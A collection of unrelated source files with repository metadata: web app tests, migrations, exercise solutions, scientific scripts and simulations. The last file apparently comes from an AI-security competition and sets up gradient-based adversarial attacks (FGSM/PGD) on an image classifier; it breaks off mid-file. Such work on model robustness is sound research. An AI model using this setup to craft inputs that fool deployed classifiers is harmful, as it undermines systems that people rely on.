b281272d10fb31464d7d8a0cb4e290739c32189e | 634367d6a94d9bce231a8c29cf9713ebfc4b1de7 | /covid_dashboard/views/get_day_wise_district_details/tests/test_case_02.py | f45bf3a2ba5ff1d48aed35ca3ba4a418dcc8c048 | [] | no_license | saikiranravupalli/covid_dashboard | 5a48c97597983ada36a3bf131edf5ca15f1dedec | 954dd02819fb8f6776fa2828e8971bd55efa657c | refs/heads/master | 2022-11-08T10:11:27.836507 | 2020-06-30T09:00:27 | 2020-06-30T09:00:27 | 269,610,409 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,278 | py | """
# TODO: get_day_wise_district_details with valid district_id returns details
"""
from covid_dashboard.utils.custom_test_utils import CustomTestUtils
from . import APP_NAME, OPERATION_NAME, REQUEST_METHOD, URL_SUFFIX
REQUEST_BODY = """
{}
"""
TEST_CASE = {
"request": {
"path_params": {"district_id": "1"},
"query_params": {},
"header_params": {},
"securities": {"oauth": {"tokenUrl": "http://localhost:8080/o/token", "flow": "password", "scopes": ["read"], "type": "oauth2"}},
"body": REQUEST_BODY,
},
}
class TestCase02GetDayWiseDistrictDetailsAPITestCase(CustomTestUtils):
app_name = APP_NAME
operation_name = OPERATION_NAME
request_method = REQUEST_METHOD
url_suffix = URL_SUFFIX
test_case_dict = TEST_CASE
def setupUser(self, username, password):
super(TestCase02GetDayWiseDistrictDetailsAPITestCase, self).\
setupUser(username=username, password=password)
self.statistics()
def test_case(self):
response = self.default_test_case()
import json
response_content = json.loads(response.content)
self.assert_match_snapshot(
name='get_day_wise_district_details_response',
value=response_content
)
| [
"saikiranravupalli@gmail.com"
] | saikiranravupalli@gmail.com |
5d51b6541ffc22ba6dbade62616ccfd70e03dba4 | e2d22f12f8e540a80d31de9debe775d35c3c5c22 | /blousebrothers/users/migrations/0002_auto_20161009_0739.py | 5caaeef0f9d6ef6321c753470fdeb2432fd49587 | [
"MIT"
] | permissive | sladinji/blousebrothers | 360c3b78ec43379977dbf470e5721e6a695b2354 | 461de3ba011c0aaed3f0014136c4497b6890d086 | refs/heads/master | 2022-12-20T10:24:07.631454 | 2019-06-13T13:17:35 | 2019-06-13T13:17:35 | 66,867,705 | 1 | 0 | NOASSERTION | 2022-12-19T18:15:44 | 2016-08-29T18:04:33 | Python | UTF-8 | Python | false | false | 757 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-10-09 07:39
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='user',
name='email',
field=models.EmailField(max_length=254, verbose_name='email address'),
),
migrations.AlterField(
model_name='user',
name='university',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='users.University', verbose_name='Ville de CHU actuelle'),
),
]
| [
"julien.almarcha@gmail.com"
] | julien.almarcha@gmail.com |
bbc0d7036c3b0d1661ec5acc2b80f06806aeda93 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /L4HM6uMHDCnepz5HK_7.py | d5c57b4d97b416320f6e56898bb1695785da62cf | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | """
Create a function that takes date in the format **yyyy/mm/dd** as an input and
returns `"Bonfire toffee"` if the date is October 31, else return `"toffee"`.
### Examples
halloween("2013/10/31") ➞ "Bonfire toffee"
halloween("2012/07/31") ➞ "toffee"
halloween("2011/10/12") ➞ "toffee"
### Notes
N/A
"""
halloween=lambda d:"Bonfire "*(d[-5:]=="10/31")+"toffee"
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
e628538fa02d09604b3f2fe873cba3fcd99a1d5c | 80e527f63953a43f7f70112759f27a75d0b25179 | /pytext/data/test/kd_doc_classification_data_handler_test.py | 8d0108c8284547354a1c3e5775a04351fee3bc40 | [
"BSD-3-Clause"
] | permissive | shruti-bh/pytext | 901c195b74a03c6efe965cbfce8fde28560e47db | ae84a5493a5331ac07699d3dfa5b9de521ea85ea | refs/heads/master | 2020-04-22T13:11:20.178870 | 2019-02-12T20:56:34 | 2019-02-12T21:20:25 | 170,400,331 | 1 | 0 | NOASSERTION | 2019-02-12T22:20:47 | 2019-02-12T22:20:47 | null | UTF-8 | Python | false | false | 3,136 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import unittest
from pytext.config.field_config import FeatureConfig
from pytext.config.kd_doc_classification import ModelInputConfig, Target, TargetConfig
from pytext.data import KDDocClassificationDataHandler
from pytext.data.featurizer import SimpleFeaturizer
from pytext.data.kd_doc_classification_data_handler import ModelInput, RawData
from pytext.utils.test_utils import import_tests_module
tests_module = import_tests_module()
class KDDocClassificationDataHandlerTest(unittest.TestCase):
def setUp(self):
file_name = tests_module.test_file("knowledge_distillation_test_tiny.tsv")
label_config_dict = {"target_prob": True}
data_handler_dict = {
"columns_to_read": [
"text",
"target_probs",
"target_logits",
"target_labels",
"doc_label",
]
}
self.data_handler = KDDocClassificationDataHandler.from_config(
KDDocClassificationDataHandler.Config(**data_handler_dict),
ModelInputConfig(),
TargetConfig(**label_config_dict),
featurizer=SimpleFeaturizer.from_config(
SimpleFeaturizer.Config(), FeatureConfig()
),
)
self.data = self.data_handler.read_from_file(
file_name, self.data_handler.raw_columns
)
def test_create_from_config(self):
expected_columns = [
RawData.TEXT,
RawData.TARGET_PROBS,
RawData.TARGET_LOGITS,
RawData.TARGET_LABELS,
RawData.DOC_LABEL,
]
# check that the list of columns is as expected
self.assertTrue(self.data_handler.raw_columns == expected_columns)
def test_read_from_file(self):
# Check if the data has 10 rows and 5 columns
self.assertEqual(len(self.data), 10)
self.assertEqual(len(self.data[0]), 5)
self.assertEqual(self.data[0][RawData.TEXT], "Who R U ?")
self.assertEqual(
self.data[0][RawData.TARGET_PROBS],
"[-0.005602254066616297, -5.430975914001465]",
)
self.assertEqual(
self.data[0][RawData.TARGET_LABELS], '["cu:other", "cu:ask_Location"]'
)
def test_tokenization(self):
data = list(self.data_handler.preprocess(self.data))
# test tokenization without language-specific tokenizers
self.assertListEqual(data[0][ModelInput.WORD_FEAT], ["who", "r", "u", "?"])
self.assertListEqual(
data[0][Target.TARGET_PROB_FIELD],
[-0.005602254066616297, -5.430975914001465],
)
def test_align_target_label(self):
target = [[0.1, 0.2, 0.3], [0.1, 0.2, 0.3]]
label_list = ["l1", "l2", "l3"]
batch_label_list = [["l3", "l2", "l1"], ["l1", "l3", "l2"]]
align_target = self.data_handler._align_target_label(
target, label_list, batch_label_list
)
self.assertListEqual(align_target, [[0.3, 0.2, 0.1], [0.1, 0.3, 0.2]])
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
f83506a11c7bb222bdbd4f3d5c0f18adfbef24c5 | 385ab972316b41cb0643f1050f9220b8eaeb4647 | /cutTheSticks.py | b33dc260c16a89e751d1f3844911ef48097f6cb2 | [] | no_license | Rpratik13/HackerRank | 09174c9b331e25cec33848a80e9109800cdbc894 | 38b9a39261bfb3b2fc208ad1e3d8a485585b419a | refs/heads/master | 2020-03-22T05:24:03.516086 | 2020-01-31T16:08:19 | 2020-01-31T16:08:19 | 139,563,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | def cutTheSticks(arr):
ans = []
while max(arr)!=0:
while min(arr)==0:
arr.remove(0)
min1 = min(arr)
count = 0
for i in range(0,len(arr)):
arr[i]-=min1
count+=1
ans.append(count)
return ans
n = int(input())
arr = list(map(int, input().rstrip().split()))
result = cutTheSticks(arr)
for i in result:
print(i) | [
"r.pratik013@gmail.com"
] | r.pratik013@gmail.com |
3019e63efae8bf251345dedc6ade8214439b4276 | d9504b779ca6d25a711c13fafc1b8669c60e6f62 | /shape_recognition/libraries/braile_recognition/plotScript.py | 4a9bd429775020ba0b1151785b48933dbe7560e2 | [
"MIT"
] | permissive | ys1998/tactile-shape-recognition | dcdd3f4da66b4b3f6159dccf9cec4d367f6483d9 | b5ab6f1cdf04ff23e14b467a590533e7ee740b52 | refs/heads/master | 2020-03-18T03:01:17.985074 | 2018-07-28T09:46:16 | 2018-07-28T09:46:16 | 134,218,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 239 | py | import numpy as np
import matplotlib.pyplot as plt
c = 0
r = 3
s = np.loadtxt('./NewData_BRC/BRC_B5.txt')
taxel = []
for k in range(c,len(s),4):
taxel.append(s[k,r])
print len(taxel)
plt.figure()
plt.plot(taxel)
plt.show()
| [
"yashshah2398@gmail.com"
] | yashshah2398@gmail.com |
8d5a89a05b311b9d5137c404950505cd7eac5bfa | f3f7099576adfb683fb74c575b235bdd6c2900c7 | /examples/demos_by_system/pendulum_double/double_pendulum_with_lqr.py | cda2f8818732a357ed072532029e056e2fe8a0f4 | [
"MIT"
] | permissive | SherbyRobotics/pyro | a1fac4508162aff662c4c6073eb2adf357b1bc8b | baed84610d6090d42b814183931709fcdf61d012 | refs/heads/master | 2023-08-08T16:16:31.510887 | 2023-07-26T17:36:26 | 2023-07-26T17:36:26 | 153,139,985 | 35 | 23 | MIT | 2023-07-26T17:36:27 | 2018-10-15T15:45:09 | Python | UTF-8 | Python | false | false | 801 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun May 24 11:51:18 2020
@author: alex
"""
import numpy as np
from pyro.dynamic.pendulum import DoublePendulum
from pyro.analysis.costfunction import QuadraticCostFunction
from pyro.dynamic.statespace import linearize
from pyro.control.lqr import synthesize_lqr_controller
# Non-linear model
sys = DoublePendulum()
# Linear model
ss = linearize( sys , 0.01 )
# Cost function
cf = QuadraticCostFunction.from_sys( sys )
cf.R[0,0] = 1000
cf.R[1,1] = 10000
# LQR controller
ctl = synthesize_lqr_controller( ss , cf )
# Simulation Closed-Loop Non-linear with LQR controller
cl_sys = ctl + sys
cl_sys.x0 = np.array([0.4,0,0,0])
cl_sys.compute_trajectory()
cl_sys.plot_trajectory('xu')
cl_sys.animate_simulation() | [
"alx87grd@gmail.com"
] | alx87grd@gmail.com |
ea960fdb336509f7286bd45c359d6f34b4776066 | 3d6704216b1acfe1c97048c1999657537596916c | /django_test/users/validators/password.py | 458a8e4d1aacd4add82592ca255529af6447b942 | [] | no_license | jupiny/django_test | e2310ee485e570e92b3f66e7f23dfa8c36a63c58 | b3ef08259177229166e54ede8f7315e2522af438 | refs/heads/master | 2021-01-17T15:46:06.636001 | 2016-11-03T05:27:34 | 2016-11-03T05:27:34 | 59,828,511 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 875 | py | import re
from django.core.exceptions import ValidationError
MINIMUM_LENGTH = 8
def validate_minimum_length(value):
if len(value) < MINIMUM_LENGTH:
raise ValidationError("The password should be at least {0} characters long.".format(MINIMUM_LENGTH))
def validate_letters(value):
# Number
if not re.search(r'[0-9]', value):
raise ValidationError("Password must contain at least 1 digit.")
# Lowercase letters
if not re.search(r'[a-z]', value):
raise ValidationError("Password must contain at least 1 lowercase letter.")
# Uppercase letters
if not re.search(r'[A-Z]', value):
raise ValidationError("Password must contain at least 1 uppercase letter.")
# Special characters
if not re.search(r'[!@#$%^&*+=]', value):
raise ValidationError("Password must contain at least 1 special character.")
| [
"tmdghks584@gmail.com"
] | tmdghks584@gmail.com |
da46a7bd47b78c6f73bfb13edface03d1800cba5 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /z5zpTucxpMLL72FCx_5.py | 707b3eb2d9448862618c21c90f1fd45b21c4bcb1 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 502 | py | """
Write a function to return the city from each of these vacation spots.
### Examples
grab_city("[Last Day!] Beer Festival [Munich]") ➞ "Munich"
grab_city("Cheese Factory Tour [Portland]") ➞ "Portland"
grab_city("[50% Off!][Group Tours Included] 5-Day Trip to Onsen [Kyoto]") ➞ "Kyoto"
### Notes
There may be additional brackets, but the city will always be in the last
bracket pair.
"""
import re
def grab_city(txt):
return re.findall(r'\[(.*?)\]', txt)[-1]
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
f1910980479f11c5206314612413a19bd533f2d5 | 30f6a276dc667ff8910dd442ddcd7d21198aef58 | /Helicons in Metals/varying_freq_analysis.py | ceb8f7d9db3dd4a1de03630827bd50adf22e6a8e | [] | no_license | ericyeung/PHY424 | 5ddef3b8e95ad253e064736c6da653c7bc260435 | 200ebbed21abbeee5b3e313adfe307d3d7c2068c | refs/heads/master | 2021-05-04T11:46:34.979089 | 2016-08-21T18:37:05 | 2016-08-21T18:37:27 | 49,386,622 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,705 | py | #!/usr/bin/env python
from __future__ import division
from math import *
import matplotlib.pyplot as plt
import numpy as np
from varying_freq_data import *
"""
Plots the resonances
Last updated: November 9
"""
__author__ = "Eric Yeung"
plt.plot(frequency26, pickup26)
plt.errorbar(frequency26, pickup26, ferror26, perror26, fmt='b+', color = 'r')
plt.xlabel('Frequency (Hz)')
plt.ylabel('Amplitude (V)')
#plt.title('For B = 8436.65 G')
plt.annotate('N = 1', xy=(321, 188.92 + 40), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.annotate('N = 3', xy=(2730, 326.2 + 40), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.show()
plt.plot(frequency16, pickup16)
plt.errorbar(frequency16, pickup16, ferror16, perror16, fmt = 'b+', color = 'r')
print np.argmax(pickup16), frequency16[np.argmax(pickup16)] # Outlier?
plt.xlabel('Frequency (Hz)')
plt.ylabel('Amplitude (V)')
#plt.title('For B = 5191.79 G')
plt.annotate('N = 1', xy=(203 + 130, 88.52 + 30), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.annotate('N = 3', xy=(1800, 195.76 + 30), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.show()
plt.plot(frequency10, pickup10)
plt.errorbar(frequency10, pickup10, ferror10, perror10, fmt = 'b+', color = 'r')
plt.xlabel('Frequency (Hz)')
plt.ylabel('Amplitude (V)')
#plt.title('For B = 3244.87 G')
plt.annotate('N = 1', xy=(136, 43.12 + 15), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.annotate('N = 3', xy=(1100 - 20, 115.75 + 20), xycoords="data", va="center", ha="center", bbox=dict(boxstyle="round", fc="w"))
plt.show()
####################################################################################
plt.plot(frequency26, pickup26, color = 'g', label = 'B = 8436.65 G')
plt.errorbar(frequency26, pickup26, ferror26, perror26, fmt='b+', color = 'r')
plt.plot(frequency16, pickup16, color = 'b', label ='B = 5191.79 G')
plt.errorbar(frequency16, pickup16, ferror16, perror16, fmt = 'b+', color = 'black')
plt.plot(frequency10, pickup10, color = 'maroon', label = 'B = 3244.87 G')
plt.errorbar(frequency10, pickup10, ferror10, perror10, fmt = 'b+', color = 'dodgerblue')
plt.xlim([0, 1000])
plt.ylim([0, 250])
freq_ticks = np.arange(0, 1100, 100)
freq_labels = freq_ticks
plt.xlabel('Frequency (Hz)')
plt.xticks(freq_ticks, freq_labels)
plt.ylabel('Amplitude (V)')
#plt.title('n$ = 1$ resonances for Various Magnetic Fields')
plt.legend().draggable()
#plt.savefig('N1_resonance_plot.png', format='png', dpi=1200)
plt.show()
print np.std(frequency26), np.std(frequency16), np.std(frequency10)
| [
"irq.ericyeung@hotmail.com"
] | irq.ericyeung@hotmail.com |
75d11f63a91f6acbedc0504480a733cffdc0e729 | 526b892fa981573f26d55c361b42a9d3fa841db5 | /haas/manage.py | 02a9c9675961e00ed03095bbba46c2c1c4dccfff | [
"BSD-2-Clause",
"BSD-3-Clause"
] | permissive | uranusjr/bbshighlighter | 13d89713245f95906a733b7aa8e7c39c58f6ec22 | da35d483e429e0cbd0619b1bc399f4fe67de9ac3 | refs/heads/master | 2020-05-31T22:36:58.424739 | 2014-03-07T17:24:00 | 2014-03-07T17:24:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 283 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "haas.settings.production")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"uranusjr@gmail.com"
] | uranusjr@gmail.com |
b5503e5ac0863cea991c31606c9d661a6930e00b | 56f1bb713f0651ac63391349deb81790df14e4b5 | /Pet/pet.py | 53de7eb4272d2f2fdb482b88cb1747a7b250ad3a | [
"CC0-1.0"
] | permissive | rajitbanerjee/kattis | 4cd46a2fe335120b8f53ca71544fc0681474118b | 3a5dd4c84c07e21f09ef45ebd9c1bad2a0adc6ad | refs/heads/master | 2022-05-05T03:19:28.744660 | 2020-08-12T18:48:55 | 2020-08-12T18:48:55 | 192,208,120 | 4 | 2 | CC0-1.0 | 2022-04-15T05:50:16 | 2019-06-16T15:38:15 | Python | UTF-8 | Python | false | false | 227 | py | """https://open.kattis.com/problems/pet"""
sums = []
for i in range(5):
enter = list(map(int, input().split()))
sums.append(sum(enter))
winPoints = max(sums)
winner = sums.index(winPoints) + 1
print(winner, winPoints) | [
"rajit.banerjee@ucdconnect.ie"
] | rajit.banerjee@ucdconnect.ie |
860e8cfb6adb792ded6055048d9bc968e99326b1 | c9f67529e10eb85195126cfa9ada2e80a834d373 | /bin/pycodestyle | df2ddc1147f5cce9be2a239439bea29ab02444b8 | [
"Apache-2.0"
] | permissive | chilung/dllab-5-1-ngraph | 10d6df73ea421bfaf998e73e514972d0cbe5be13 | 2af28db42d9dc2586396b6f38d02977cac0902a6 | refs/heads/master | 2022-12-17T19:14:46.848661 | 2019-01-14T12:27:07 | 2019-01-14T12:27:07 | 165,513,937 | 0 | 1 | Apache-2.0 | 2022-12-08T04:59:31 | 2019-01-13T14:19:16 | Python | UTF-8 | Python | false | false | 255 | #!/home/ccma/n1p1/home/ccma/Chilung/lab5-venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pycodestyle import _main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(_main())
| [
"chilung.cs06g@nctu.edu.tw"
] | chilung.cs06g@nctu.edu.tw | |
721cec5d08493be8d4487e275ec3dac5977eeea6 | fbd4ecf7046171c4e96267c5982c964db54578f5 | /start code/src/Customer.py | 5e8cda2dc0acb09e187f3585b986fb294ad215a5 | [] | no_license | Alvin2580du/alvin_py | 6dddcfbfae214694e9f3dafd976101e681f2a66d | 82d3e9808073f2145b039ccf464c526cb85274e3 | refs/heads/master | 2021-05-05T16:01:43.544783 | 2019-10-29T02:23:59 | 2019-10-29T02:23:59 | 117,328,713 | 12 | 2 | null | 2021-03-20T00:06:37 | 2018-01-13T08:51:49 | Python | UTF-8 | Python | false | false | 1,279 | py | from flask_login import UserMixin
from abc import ABC, abstractmethod
class User(UserMixin, ABC):
__id = -1
def __init__(self, username, password):
self._id = self._generate_id()
self._username = username
self._password = password
@property
def username(self):
return self._username
@property
def is_authenticated(self):
return True
@property
def is_active(self):
return True
@property
def is_anonymous(self):
return False
def get_id(self):
"""Required by Flask-login"""
return str(self._id)
def _generate_id(self):
User.__id += 1
return User.__id
def validate_password(self, password):
return self._password == password
@abstractmethod
def is_admin(self):
pass
class Customer(User):
def __init__(self, username, password, licence):
super().__init__(username, password)
self._licence = licence
def is_admin(self):
return False
def __str__(self):
return f'Customer <name: {self._username}, licence: {self._licence}>'
class Admin(User):
def is_admin(self):
return True
def __str__(self):
return f'Admin <name: {self._username}>'
| [
"ypducdtu@163.com"
] | ypducdtu@163.com |
8829126941188052375e680fa9fb5c24cf8b972b | 17ca5bae91148b5e155e18e6d758f77ab402046d | /Comparsion/compare_Federica_SED_data/compare_result.py | c3a371fd9726be0f5a55285fd4ac2f393152474a | [] | no_license | dartoon/QSO_decomposition | 5b645c298825091c072778addfaab5d3fb0b5916 | a514b9a0ad6ba45dc9c3f83abf569688b9cf3a15 | refs/heads/master | 2021-12-22T19:15:53.937019 | 2021-12-16T02:07:18 | 2021-12-16T02:07:18 | 123,425,150 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,456 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu May 9 14:00:30 2019
@author: Dartoon
Comparing the fitting between Xuheng and Federica
"""
import numpy as np
import astropy.io.fits as pyfits
import matplotlib.pyplot as plt
import sys
sys.path.insert(0,'../../py_tools')
from load_result import load_host_p, load_err
ID = ['CID1174', 'CID1281', 'CID206', 'CID216', 'CID237', 'CID255', 'CID3242',
'CID3570', 'CID452', 'CID454', 'CID50', 'CID543', 'CID597', 'CID607',
'CID70', 'LID1273', 'LID1538', 'LID360', 'XID2138', 'XID2202', 'XID2396',
'CDFS-1', 'CDFS-229', 'CDFS-321', 'CDFS-724', 'ECDFS-358', 'SXDS-X1136',
'SXDS-X50', 'SXDS-X717', 'SXDS-X735', 'SXDS-X763', 'SXDS-X969']
Mstar = load_host_p(ID=ID, folder='../../')[1]
Mstar_err = load_err(prop = 'Mstar', ID=ID)
LR = load_host_p(ID=ID, folder='../../', dm = 0)[0] #!!! This dm is important
LR_err = load_err(prop = 'LR', ID=ID)
Fede = np.loadtxt('Summary.txt') #0ID 1M*_SED 2M*_IMAGEDEC 3LR_SED 4LR_IMAGEDEC 5agreement
bool = [Fede[:,3]!=-99] #exclude CID255 at this moment
#%%
plt.figure(figsize=(10, 10))
x = np.linspace(8., 12, 20)
y = x
plt.plot(x,y, 'gray', alpha=0.5)
#plt.plot(LR[bool], Fede[:,3][bool], 'bo', label='SED only')
plt.errorbar(LR[bool], Fede[:,3][bool], xerr=[np.abs(LR_err)[:,0][bool], np.abs(LR_err)[:,1][bool]],yerr=0.2 + np.zeros(len(Mstar[bool])),fmt='.',color='blue',markersize=15, label='SED only')
#plt.plot(LR[bool], Fede[:,4][bool], 'r^', label='fix HST result')
plt.xlim([8.8,11.8])
plt.ylim([8.8,11.8])
plt.title("Comparsion of LR",fontsize=35)
plt.xlabel("Xuheng log$(L_R/L_{\odot})$",fontsize=35)
plt.ylabel("Federica log$(L_R/L_{\odot})$",fontsize=35)
plt.grid(linestyle='--')
plt.tick_params(labelsize=25)
#plt.legend(prop={'size':20})
plt.show()
#%%
plt.figure(figsize=(10, 10))
x = np.linspace(8.5, 12.5, 20)
y = x
plt.plot(x,y, 'gray', alpha=0.5)
plt.errorbar(Mstar[bool], Fede[:,1][bool], xerr=[np.abs(Mstar_err)[:,0][bool], np.abs(Mstar_err)[:,1][bool]],yerr=0.3 + np.zeros(len(Mstar[bool])),fmt='.',color='blue',markersize=15, label='SED only')
#plt.plot(Mstar[bool], Fede[:,2][bool], 'r^', label='fix HST result')
plt.xlim([8.5,12.5])
plt.ylim([8.5,12.5])
plt.title("Comparsion of M*",fontsize=35)
plt.xlabel("Xuheng log$(M_*/M_{\odot})$",fontsize=35)
plt.ylabel("Federica log$(M_*/M_{\odot})$", fontsize=35)
plt.grid(linestyle='--')
plt.tick_params(labelsize=25)
#plt.legend(prop={'size':20})
plt.show() | [
"dingxuheng@mail.bnu.edu.cn"
] | dingxuheng@mail.bnu.edu.cn |
dcc3c59f832a438160969f7eff0db6008ce5f49a | 632dcb4e37cadd87cb7ff8715b0048df5cd0d11b | /CompuCell3D/core/Demos/CC3DPy/scripts/AdhesionDemo.py | a0e3522ec008b21130e6d566bf455e82f0417b33 | [
"MIT"
] | permissive | CompuCell3D/CompuCell3D | df638e3bdc96f84b273978fb479842d071de4a83 | 65a65eaa693a6d2b3aab303f9b41e71819f4eed4 | refs/heads/master | 2023-08-26T05:22:52.183485 | 2023-08-19T17:13:19 | 2023-08-19T17:13:19 | 12,253,945 | 51 | 41 | null | 2023-08-27T16:36:14 | 2013-08-20T20:53:07 | C++ | UTF-8 | Python | false | false | 3,763 | py | """
This example demonstrates how to specify cell adhesion on the basis of molecular species.
"""
__author__ = "T.J. Sego, Ph.D."
__email__ = "tjsego@iu.edu"
from cc3d.core.PyCoreSpecs import Metadata, PottsCore
from cc3d.core.PyCoreSpecs import CellTypePlugin, VolumePlugin, ContactPlugin
from cc3d.core.PyCoreSpecs import UniformInitializer
from cc3d.core.PyCoreSpecs import AdhesionFlexPlugin
from cc3d.CompuCellSetup.CC3DCaller import CC3DSimService
def main():
###############
# Basic setup #
###############
# An interactive CC3D simulation can be initialized from a list of core specs.
# Start a list of core specs that define the simulation by specifying a two-dimensional simulation
# with a 100x100 lattice and second-order Potts neighborhood, and metadata to use multithreading
dim_x = dim_y = 100
specs = [
Metadata(num_processors=4),
PottsCore(dim_x=dim_x,
dim_y=dim_y,
neighbor_order=2,
boundary_x="Periodic",
boundary_y="Periodic")
]
##############
# Cell Types #
##############
# Define three cell types called "T1" through "T3".
cell_types = ["T1", "T2", "T3"]
specs.append(CellTypePlugin(*cell_types))
#####################
# Volume Constraint #
#####################
# Assign a volume constraint to all cell types.
volume_specs = VolumePlugin()
for ct in cell_types:
volume_specs.param_new(ct, target_volume=25, lambda_volume=2)
specs.append(volume_specs)
############
# Adhesion #
############
# Assign uniform adhesion to all cells, and additional adhesion by molecular species
contact_specs = ContactPlugin(neighbor_order=2)
for idx1 in range(len(cell_types)):
contact_specs.param_new(type_1="Medium", type_2=cell_types[idx1], energy=16)
for idx2 in range(idx1, len(cell_types)):
contact_specs.param_new(type_1=cell_types[idx1], type_2=cell_types[idx2], energy=16)
specs.append(contact_specs)
adhesion_specs = AdhesionFlexPlugin(neighbor_order=2)
adhesion_specs.density_new(molecule="M1", cell_type="T1", density=1.0)
adhesion_specs.density_new(molecule="M2", cell_type="T2", density=1.0)
formula = adhesion_specs.formula_new()
formula.param_set("M1", "M1", -10.0)
formula.param_set("M1", "M2", 0.0)
formula.param_set("M2", "M2", 10.0)
specs.append(adhesion_specs)
####################################
# Cell Distribution Initialization #
####################################
# Initialize cells over the entire domain.
unif_init_specs = UniformInitializer()
unif_init_specs.region_new(width=5, pt_min=(0, 0, 0), pt_max=(dim_x, dim_y, 1),
cell_types=["T1", "T1", "T2", "T2", "T3"])
specs.append(unif_init_specs)
#####################
# Simulation Launch #
#####################
# Initialize a CC3D simulation service instance and register all simulation specification.
cc3d_sim = CC3DSimService()
cc3d_sim.register_specs(specs)
cc3d_sim.run()
cc3d_sim.init()
cc3d_sim.start()
#################
# Visualization #
#################
# Show a single frame to visualize simulation data as it is generated.
cc3d_sim.visualize()
#############
# Execution #
#############
# Wait for the user to trigger execution
input('Press any key to continue...')
# Execute 10k steps
while cc3d_sim.current_step < 10000:
cc3d_sim.step()
# Report performance
print(cc3d_sim.profiler_report)
# Wait for the user to trigger termination
input('Press any key to close...')
if __name__ == '__main__':
main()
| [
"tjsego@gmail.com"
] | tjsego@gmail.com |
783ec51dceb9fa9c98c3845feb2efa5b9fc3a98a | fb3caa66ac0b2254b422303d670a70e597067758 | /201911_AI_Sec_Baidu/core-attack-codes/b_04.py | 03f7281f7068cfaf99a57ec7f5d848afd55c0a40 | [] | no_license | dyngq/Competitions | 065ec9f153919950b161aaa9fff6a9de9e29ba32 | e9b7ff8fbe038e148bc61b21b077f35cdc5368a9 | refs/heads/master | 2021-06-13T13:55:11.352531 | 2021-05-08T09:49:24 | 2021-05-08T09:49:24 | 186,392,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,927 | py | #coding=utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import functools
import numpy as np
import paddle.fluid as fluid
#加载自定义文件
import models
from attack.attack_pp import FGSM, PGD
from utils import init_prog, save_adv_image, process_img, tensor2img, calc_mse, add_arguments, print_arguments
#######parse parameters
parser = argparse.ArgumentParser(description=__doc__)
add_arg = functools.partial(add_arguments, argparser=parser)
add_arg('class_dim', int, 121, "Class number.")
add_arg('shape', str, "3,224,224", "output image shape")
add_arg('input', str, "./input2_image/", "Input directory with images")
add_arg('output', str, "./input3_image/", "Output directory with images")
args = parser.parse_args()
print_arguments(args)
######Init args
image_shape = [int(m) for m in args.shape.split(",")]
class_dim=args.class_dim
input_dir = args.input
output_dir = args.output
model_name="MobileNetV2_x2_0"
pretrained_model="./models_parameters/MobileNetV2_x2_0"
val_list = 'val_list.txt'
use_gpu=True
######Attack graph
adv_program=fluid.Program()
#完成初始化
with fluid.program_guard(adv_program):
input_layer = fluid.layers.data(name='image', shape=image_shape, dtype='float32')
#设置为可以计算梯度
input_layer.stop_gradient=False
# model definition
model = models.__dict__[model_name]()
out_logits = model.net(input=input_layer, class_dim=class_dim)
out = fluid.layers.softmax(out_logits)
place = fluid.CUDAPlace(0) if use_gpu else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
#记载模型参数
fluid.io.load_persistables(exe, pretrained_model)
#设置adv_program的BN层状态
init_prog(adv_program)
#创建测试用评估模式
eval_program = adv_program.clone(for_test=True)
#定义梯度
with fluid.program_guard(adv_program):
label = fluid.layers.data(name="label", shape=[1] ,dtype='int64')
loss = fluid.layers.cross_entropy(input=out, label=label)
gradients = fluid.backward.gradients(targets=loss, inputs=[input_layer])[0]
######Inference
def inference(img):
